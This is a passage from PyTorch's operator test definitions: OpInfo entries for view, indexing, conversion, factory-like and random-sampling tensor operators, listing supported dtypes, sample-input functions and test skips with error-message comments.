reference_inputs_func=partial(reference_inputs_view_reshape, transpose_samples=False), skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('view_as', op=lambda x, other: x.view_as(other), dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_view_as_reshape_as, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), )), OpInfo('atleast_1d', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_atleast1d2d3d, skips=( # JIT does not support variadic tensors. # RuntimeError: input->type()->kind() == TypeKind::OptionalType # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":252, # please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), ), OpInfo('atleast_2d', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), sample_inputs_func=sample_inputs_atleast1d2d3d, ), OpInfo('atleast_3d', dtypes=all_types_and_complex_and(torch.complex32, torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=[torch.float32]), ), sample_inputs_func=sample_inputs_atleast1d2d3d, ), OpInfo('flatten', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_flatten, reference_inputs_func=reference_inputs_flatten, ), OpInfo('column_stack', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"),), sample_inputs_func=sample_inputs_column_stack,), OpInfo('pinverse', op=torch.pinverse, dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_out=False, sample_inputs_func=sample_inputs_linalg_invertible, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), )), OpInfo('gather', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_gather, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, supports_forward_ad=True, supports_fwgrad_bwgrad=True, error_inputs_func=error_inputs_gather, ), OpInfo('index_fill', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_index), OpInfo('index_copy', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, skips=( ), sample_inputs_func=sample_inputs_index, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('index_select', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_index, error_inputs_func=error_inputs_index_select, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('index_add', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, sample_inputs_func=sample_inputs_index, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('index_reduce', dtypes=floating_types_and(torch.float16, torch.bfloat16), supports_out=True, sample_inputs_func=sample_inputs_index_reduce), OpInfo('__getitem__', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_inplace_autograd=False, supports_scripting=False, op=torch.Tensor.__getitem__, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: False is not true : Scalars failed to compare as equal! 0 != 104448 DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='cuda'),), sample_inputs_func=sample_inputs_getitem), OpInfo('index_put', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), supports_out=False, supports_inplace_autograd=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, test_neg_view=False, sample_inputs_func=sample_inputs_index_put, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: The following operation failed in the TorchScript interpreter. # Traceback of TorchScript (most recent call last): # File "<string>", line 3, in forward # def the_method(i0, i1: List[torch.Tensor], i2): # return torch.index_put(i0, i1, i2, accumulate=False) # ~~~~~~~~~~~~~~~ <--- HERE # RuntimeError: a leaf Variable that requires grad is being used in an in-place operation. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('sort', dtypes=all_types_and(torch.bool, torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_sort, supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo('unique', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.float16), sample_inputs_func=sample_inputs_unique, supports_out=False, supports_autograd=False, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 76571 DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values', dtypes=(torch.float16, torch.float32, torch.float64)), )), OpInfo('unique_consecutive', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.float16), sample_inputs_func=sample_inputs_unique_consecutive, supports_out=False, supports_autograd=False, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 76571 DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values', dtypes=(torch.float16, torch.float32, torch.float64)), )), OpInfo('put', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, check_batched_gradgrad=False, # vmap complains of the sizes skips=( # Problem, needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ), sample_inputs_func=sample_inputs_put), OpInfo('take', dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), check_batched_grad=False, # vmap complains of the sizes supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_take, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), ), error_inputs_func=error_inputs_take), OpInfo('scatter', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_scatter, error_inputs_func=error_inputs_scatter_and_scatter_add), OpInfo('bfloat16', op=lambda x, *args, **kwargs: x.bfloat16(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness'), )), OpInfo('bool', op=lambda x, *args, **kwargs: x.bool(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 76047 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.int8,)), )), OpInfo('byte', op=lambda x, *args, **kwargs: x.byte(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, # The autograd test runner cannot handle functions that change dtype supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('char', op=lambda x, *args, **kwargs: x.char(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, # The autograd test runner cannot handle functions that change dtype supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('double', op=lambda x, *args, **kwargs: x.double(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('float', op=lambda x, *args, **kwargs: x.float(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('half', op=lambda x, *args, **kwargs: x.half(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=True, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('int', op=lambda x, *args, **kwargs: x.int(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('long', op=lambda x, *args, **kwargs: x.long(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('short', op=lambda x, *args, **kwargs: x.short(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_conversion, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # RuntimeError: attribute lookup is not defined on builtin DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), )), OpInfo('chalf', op=lambda x, *args, **kwargs: x.chalf(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_conversion, skips=( # autograd tests don't handle operators that change dtype DecorateInfo(unittest.expectedFailure, 'TestGradients'), # use of lambda doesn't work with test_normalize_operator_exhaustive DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # RuntimeError: "index_select" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_noncontiguous_samples', dtypes=(torch.float, torch.cfloat)), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_variant_consistency_eager', device_type='cpu'), # TypeError: 'int' object is not iterable DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view', device_type='cpu'), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view', device_type='cpu'), # RuntimeError: "sum_cpu" not implemented for 'ComplexHalf' # RuntimeError: "neg_conj_cuda" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), ) ), OpInfo('empty_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_like_fns, reference_inputs_func=reference_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_complex_half_reference_testing'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('zeros_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('ones_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('randn_like', dtypes=floating_types_and(torch.half, torch.bfloat16, torch.complex32, torch.complex64, torch.complex128), op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.randn_like, inp, *args, **kwargs), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, supports_sparse_csr=True, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip("Expected: randn_like is not comparable between dtypes"), 'TestCommon', 'test_complex_half_reference_testing'), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), )), OpInfo('rand_like', dtypes=floating_types_and(torch.half, torch.bfloat16, torch.complex32, torch.complex64, torch.complex128), op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.randn_like, inp, *args, **kwargs), supports_out=False, sample_inputs_func=sample_inputs_like_fns, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), DecorateInfo(unittest.skip("Expected: randn_like is not comparable between dtypes"), 'TestCommon', 'test_complex_half_reference_testing'), )), OpInfo('randint_like', dtypes=all_types_and(torch.half, torch.bfloat16), op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.randint_like, inp, *args, **kwargs), supports_out=False, sample_inputs_func=sample_inputs_randint_like, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('full_like', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_out=False, sample_inputs_func=sample_inputs_full_like, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), OpInfo('new_zeros', op=lambda x, *args, **kwargs: x.new_zeros(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_fns, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), supports_autograd=False), OpInfo('new_ones', op=lambda x, *args, **kwargs: x.new_ones(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_fns, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), supports_autograd=False), OpInfo('new_empty', op=lambda x, *args, **kwargs: x.new_empty(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_fns, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), DecorateInfo(unittest.skip("Expected: new_empty is not comparable"), 'TestCommon', 'test_complex_half_reference_testing'), ), supports_autograd=False), OpInfo('empty', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_empty, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness'), # Empty tensor data is garbage so it's hard to make comparisons with it. DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_out_warning'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestLazyOpInfo'), DecorateInfo(unittest.skip("Expected: empty is not comparable"), 'TestCommon', 'test_complex_half_reference_testing'), )), OpInfo('new_full', op=lambda x, *args, **kwargs: x.new_full(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_out=False, sample_inputs_func=sample_inputs_new_full, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ), supports_autograd=False), OpInfo('multinomial', op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.multinomial, inp, *args, **kwargs), method_variant=lambda inp, *args, **kwargs: wrapper_set_seed(torch.Tensor.multinomial, inp, *args, **kwargs), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), supports_out=True, sample_inputs_func=sample_inputs_multinomial, error_inputs_func=error_inputs_multinomial, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Strides are not the same! # This may not be reproducible in CI DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning')), supports_autograd=False), OpInfo('normal', op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.normal, inp, *args, **kwargs), # The inplace variant (Tensor.normal_) is different from torch.normal inplace_variant=None, dtypes=floating_types_and(torch.bfloat16, torch.half), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.half), supports_out=True, sample_inputs_func=sample_inputs_normal_tensor_first, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Tensor-likes are not close! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # NotImplementedError not raised DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), # Computed gradient is incorrect -- would be an exfail but gradgrad somehow passes DecorateInfo(unittest.skip("Gradients are incorrect!"), 'TestGradients'),)), OpInfo('normal', # This has its own variant b/c OpInfos assume the first arg is a Tensor but it is not here variant_test_name='number_mean', op=lambda std, mean, *args, **kwargs: wrapper_set_seed(torch.normal, mean, std, *args, **kwargs), # The inplace variant (Tensor.normal_) is different from torch.normal inplace_variant=None, dtypes=floating_types_and(torch.bfloat16, torch.half), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.half), supports_out=True, sample_inputs_func=sample_inputs_normal_tensor_second, skips=( DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # NotImplementedError not raised DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad'), # Computed gradient is incorrect -- would be an exfail but gradgrad somehow passes DecorateInfo(unittest.skip("Gradients are incorrect!"), 'TestGradients'),)), OpInfo('bernoulli', op=lambda inp, *args, **kwargs: wrapper_set_seed(torch.bernoulli, inp, *args, **kwargs), # The inplace variant (Tensor.bernoulli_) is different from torch.bernoulli inplace_variant=None, method_variant=lambda inp, *args, **kwargs: wrapper_set_seed(torch.Tensor.bernoulli, inp, *args, **kwargs), dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.bfloat16, torch.half), supports_out=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_bernoulli, skips=( # vmap: We do not yet support calling random operations inside of vmap DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Expected RuntimeError when doing an unsafe cast from a result of # dtype torch.float32 into an out= with dtype torch.lon DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # UserWarning not triggered : Resized a non-empty tensor but did not warn about it. 